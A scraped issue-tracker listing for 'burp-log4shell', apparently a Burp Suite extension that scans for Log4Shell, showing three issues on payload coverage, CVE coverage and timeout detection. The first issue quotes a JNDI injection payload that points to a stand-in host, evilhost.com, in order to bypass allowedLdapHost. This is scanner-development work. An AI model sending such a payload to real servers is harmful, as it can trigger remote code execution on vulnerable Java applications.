burp-log4shell issues

Results 3 burp-log4shell issues

Sort by recently updated

Additional payloads for allowedLdapHost and allowedClasses bypass

This will require improved payloads: https://twitter.com/marcioalm/status/1471740771581652995 Example from the twitter: ``` ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} ```

v-p-b

enhancement

CVE coverage

Hi, Could you please confirm whether Log4Shell Scanner Burpsuite Pro Addon is capable to identify log4j vulnerabilities of CVE-2021-44832, CVE-2021-45105 & CVE-2021-45046. Thanks Saleem Choudary

saleem024

question

Detecting delayed responses/timeouts?

I wonder if it would make sense to generate a low confidence issue if the answer takes >29s to arrive (I've read that Java timeouts after 31s and Burp drops...

v-p-b

enhancement

burp-log4shell
burp-log4shell copied to clipboard

Metadata

Additional payloads for allowedLdapHost and allowedClasses bypass

CVE coverage

Detecting delayed responses/timeouts?

← Metadata

Owner

Metadata

burp-log4shell burp-log4shell copied to clipboard

Metadata

Additional payloads for allowedLdapHost and allowedClasses bypass

CVE coverage

Detecting delayed responses/timeouts?

← Metadata

Owner

Metadata

burp-log4shell
burp-log4shell copied to clipboard